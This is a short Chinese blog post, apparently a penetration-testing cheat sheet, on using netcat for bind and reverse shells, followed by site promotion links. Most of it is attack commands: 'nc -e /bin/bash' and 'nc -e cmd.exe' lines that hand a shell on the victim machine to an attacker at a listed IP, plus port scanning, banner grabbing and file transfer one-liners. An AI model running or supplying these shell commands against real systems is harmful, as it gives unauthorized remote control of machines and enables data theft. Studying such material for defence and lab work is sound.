隧道技术-nc
shell反弹
正向反弹:攻击机直接连接靶机
条件:攻击机与靶机需互相访问
eg:攻击机:192.168.3.27 靶机:192.168.3.29
1111是端口号
靶机执行:
windows机器:nc -lvvp 1111 -e C:\Windows\System32\cmd.exe
Linux机器: nc -lvvp 1111 -e /bin/bash
攻击机执行:
nc 192.168.3.29 1111
反响反弹:靶机访问攻击机
条件:攻击机不能直接访问靶机,但靶机可以访问攻击机的机器,这个时候用反响shell
eg:攻击机:192.168.3.27 靶机:192.168.3.29
攻击机执行:nc -lvvp 1111 监听1111端口
靶机执行:
windows机器IP端口:nc -e C:\Windows\System32\cmd.exe 192.168.3.27 1111
Linux机器IP端口:nc -e /bin/bash 192.168.3.27 1111
Banner抓取:靶机运行着ssh服务,可查看服务版本
nc -nv IP port
端口探测:可查看端口开放
.\nc.exe -nv IP PORT
多端口探测
nc -v -z IP 1-65525
端口监听
nc -l -p Port
文件传输
接收端:nc -lp Port>file
发送端:nc -vn IP Port < file -q 1(Windows是-w Linux是-q)
经历使然,成功还是失败?
这是一个值得思考的问题... ...
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】